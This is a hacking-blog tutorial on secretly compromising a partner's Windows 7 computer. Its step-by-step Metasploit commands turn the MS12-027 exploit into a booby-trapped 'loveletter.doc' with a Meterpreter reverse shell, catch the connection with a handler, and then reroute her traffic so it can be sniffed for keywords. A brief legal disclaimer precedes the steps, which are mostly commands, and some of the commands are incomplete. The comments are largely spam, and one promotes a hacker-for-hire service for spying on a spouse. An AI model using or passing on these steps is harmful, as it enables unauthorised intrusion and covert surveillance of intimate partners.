Select Page

How to Hack Windows 7 to See Whether Your Girlfriend Is Cheating or Not

How to Hack Windows 7 to See Whether Your Girlfriend Is Cheating or Not

Welcome back, my hacker apprentices!

Several of you have written asking me how you can check on whether your boyfriend, girlfriend, or spouse is cheating on you, so I dedicate this tutorial to all of you with doubts about the fidelity of your spouse, girlfriend, or boyfriend.

A Fair Warning

Before I start, I want to point out that hacking into somebody’s computer is illegal in most countries. What might be the consequences for hacking into a friend’s or spouse’s computer? Kelly Terry, one of our Null Byte community members, has firsthand experience with her husband, who’s now paying a heavy price. She recounts her experience on her blog.

I’m not a relationship counselor or anything of that sort, but if you’re worried that your partner is cheating on you, there are only two possibilities. First, they are NOT cheating on you and your paranoia is destructive to the relationship. Second, they ARE cheating on you and you should get out of the relationship.

My point here is that if you’re obsessed with jealousy in your relationship, you should either remove that feeling or leave the relationship. Hacking their machine to find evidence is only likely to make the situation worse because you could…

  1. End up in prison like Kelly Terry’s husband,
  2. Find nothing, but that won’t relieve the anxiety and jealousy, or
  3. Find something, and you knew all along that the relationship was bad for you.

None of these outcomes are good!

Just a warning.

The instructions below are merely for learning purposes.

Step 1Compromise Her System

Let’s fire up BackTrack and Metsploit and figure out a way to compromise her system.

A couple of years back (April 2012), an exploit was found in the wild that you could create a buffer overflow (I’ll be doing a tutorial to explain buffer overflows soon) in Windows 7 systems with Office 2007 or Office 2010. Since I know my girlfriend has Windows 7 and Office 2007 on her computer, this just might be the perfect exploit to use on her.

MUST READ:  How to change your Friend's Computer Password without knowing their current Password.

In addition, I often send her little love letters as attachments, so she will not suspect anything if I send another. This time, though, I will embed the Meterpreter so that I can “own” her system and check up on her.

Of course, I think it goes without saying (maybe not?) that this exploit will work with anyone that trusts you enough to open your Word document. Similar tactics are used by spammers and scammers all the time.

When this vulnerability was found in the wild, Microsoft designated it MS12-027. Metasploit developers then wrote an exploit for Metasploit that does exactly the same thing and named it ms12_027_mscomctl_bof. If we want to use it to exploit our girlfriend’s computer, we can find it by typing at the msfconsole:

  • msf > search ms12_027

This should retrieve just one exploit as above. To avoid typographical errors, simply copy and paste it into the next line like I have done above.

Step 2Let’s Get Some Background Info

If I’m new to an exploit, I like to learn a little about what it does before I start. Let’s type:

  • msf > info

Notice that this exploit has two potential targets, Microsoft Office 2007 (target 0) and Microsoft Office 2010 (target 1). In addition, in the description it states:

“This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed a specially crafted…”

Notice that it also states “The DEP/ASLR bypass on Office 2010…”. For those of you are unfamiliar, DEP is Data Execution Prevention and ASLR is Address Space Layout Randomization. Both are implemented on most operating systems to prevent exactly what we are doing here.

MUST READ:  Yahoo Says It’s Confirmed, 1 Billion User Accounts Hacked

Step 3Show Targets & Create Doc

Since we’re pretty certain she uses Office 2007 and not Office 2010, let’s set our target for 2007.

  • set target 0

Now, rather than use the generic msf.doc that comes with this exploit, let’s give it a name that will entice her to open it. Let’s call it loveletter.doc.

  • set FILENAME loveletter.doc

We next have to give it a payload and tell it what system it needs to connect back to (LHOST) when she opens it.

  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST

With all the options set, we type exploit and Metasploit creates our malicious document and places it in the /root/.msf/local directory with a name we gave it, loveletter.doc.

Step 4Multi Handler

Now that we have the malicious Word file created called loveletter.doc, we next need to open a multi-handler on our Metasploit system to receive the connection when she opens the file.

  • use exploit/multi/handler
  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST
  • exploit

Now, as you can see, Metasploit has a listener waiting for a connection from the girlfriend’s computer. Let’s email her that loveletter.doc and when she opens that file, it will create a Meterpreter session on our computer and we will own her system!

As you can see, she opened the file and a Meterpreter session opened on our computer. We own her system!

Step 5Verify It’s the Right Computer

Just to make certain we’re on the right computer, let’s get the sysinfo:

  • meterpreter > sysinfo

As you can see, it tells us that the system we have compromised is a Windows 7 64-bit computer. That’s her machine!

MUST READ:  How To Make Your PC Boot Faster By “Last BIOS Time” Tweaks

Step 6Forward Her Internet Traffic Back Through Us

Now that we have control of her system, you can forward all her Internet traffic through your computer. In this way, you can sniff her traffic and search for telltale signs of cheating, such as keywords. You might even setup an intrusion detection system on her traffic looking for keywords that will alert you.

First, forward her traffic to you by typing at the Meterpreter prompt:

  • meterpreter> portfwd add -L -l 80 -r -p 80

Next, we need to forward all traffic from her through our computer out to the Internet. We can do that by turning on ipforwarding on on our system. We do that by typing:

  • bt > echo 1 /proc/sys/net/ipv4/ipforward

Step 7Search for Keywords

Now that all her traffic is going through your system, you can view her traffic through Wireshark to see what sites she is visiting and even better, set up Snort to look for keywords in her TCP stream going through our computer.

So now, my hacker apprentices, we have several different ways to hack Windows 7 systems, but we still have more, so keep coming back.

About The Author

He is the brain behind He started this platform as a one man army to bring news from the dark side or call it the hidden side of the Internet. He is a security researcher with an interest in cyber attacks, politics, and sport.


  1. We desire you to experience the fullest potential of this groundbreaking weight loss product and
    we take pride in setting the industry standard for purity and potency.

  2. Hi, I’m Leslie. I had my friend help me hack into my spouse’s hotmail , facebook,WhatsApp,call logs, and phone text messages cause I suspected he was cheating. All he asked for was a phone number. His email is ([email protected]).
    If u need help, tell him Leslie reffered u to him and he’ll help. Good luck.

  3. CA homes for other as well as sale Oceanside realestate on ®, find Oceanside.
    Research Oceanside houses, apartments, townhomes and single-family residences by value and location.

  4. Thank you for your own hard work on this website. My mum really loves managing investigation and it
    is obvious why. Most of us hear all regarding the powerful means you provide great solutions by means of the blog and as well as
    recommend contribution from other people about this point while our favorite girl is without
    question understanding a great deal. Have fun with the rest of the year.
    You have been conducting a remarkable job.

  5. Hey there! This post could not be written any better!
    Reading through this post reminds me of my old room mate!

    He always kept talking about this. I will forward this article to
    him. Pretty sure he will have a good read. Thanks for sharing!

  6. It’s an amazing article for all the internet visitors; they will get benefit from it I am sure.

  7. Abroad, modified cars long, first appeared in the modified car to better participate
    in the competition, drag racing, like so many people have converted their car engines,.
    Be smart and savvy when negotiating the interest rate for new cars and don’t just sign on the bottom line.
    00 per gallon, depending on market prices, but that is a good benchmark.

  8. So you, as the restorer, have to set realistic goals as to exactly
    what parts of the car you are going to restore to their original states and what parts of
    the car you are willing to restore “as close as possible” to their original
    states. Once you do that take a spray bottle filled with 4 cups
    of warm water and a tablespoon of detergent and spray the stain. Access Free Online Maps via Wi –
    Fi or 3G network, such as Google Map.

  9. A new technology introduced by one of the biggest automobile companies, Volvo, will ensure that your car avoid accidents on the roads
    involving pedestrians. Driven aggressively, the cars will run out of power in about 30 minutes.
    It is available in two versions of petrol and diesel and has been a
    very reasonable price.

  10. whoah this blog is wonderful i love reading your posts. Keep up the good work! You know, lots of people are looking around for this information, you could aid them greatly.

  11. With over six kilometers of front beach paths, Oceanside lets you skate, motorcycle
    or jog for your heart’s content.

  12. A really detailed guide towards the points of destinations and interest about CA.
    Here I am , a native of Florida, and visited the shores in the past when, but don’t remember a lot of the
    information prepared below, especially the rose grounds…exactly
    what a look that would be. On my way down to see to NM a PAL, will
    need to have a side trip and revisit.

  13. It’s really a great and helpful piece oof info.
    I’m happy thatt you simply shared this helpful info with us.
    Please keep us informed like this. Thank you for sharing.

  14. Hello, i think that i saw you visited my site so i came to “return the
    favor”.I’m trying to find things to improve my website!I suppose its ok to use some of your ideas!!

  15. Post writing is also a excitement, if you be familiar with then you can write or
    else it is difficult to write.

  16. Wonderful goods from you, man. I’ve take into accout your stuff previous
    to and you are just extremely magnificent. I really like
    what you have bought here, certainly like what
    you are stating and the best way through which you assert
    it. You make it entertaining and you still take care
    of to keep it wise. I can not wait to read much more from you.
    This is actually a tremendous web site.

  17. Hi there friends, how is the whole thing, and what you would like to say on the topic of this piece of writing, in my view
    its in fact remarkable designed for me.

  18. Your way of telling everything in this post is genuinely nice, every one be able to simply know it, Thanks a lot.

  19. Thank you for sharing your info. I really appreciate your efforts
    and I am waiting for your next post thanks once again.

  20. Hey are using WordPress for your blog platform? I’m new to the blog world but
    I’m trying to get started and set up my own. Do you require any coding
    expertise to make your own blog? Any help would be really appreciated!

  21. I don’t know if it’s just me or if perhaps everybody else encountering issues with
    your website. It appears like some of the written text in your posts are running off the screen. Can somebody else please provide feedback and let me know if this is happening to them as well?
    This could be a problem with my web browser because I’ve had this happen previously.


  22. Hello, i read your blog from time to time and i own a similar
    one and i was just curious if you get a lot of spam feedback?
    If so how do you protect against it, any plugin or anything you can advise?
    I get so much lately it’s driving me insane so any help is very much appreciated.


Leave a reply

Your email address will not be published. Required fields are marked *

Sign up for premium Hacking Tutorials


Your ad can be here. Contact us: [email protected]


For more Premium Tutorials LIke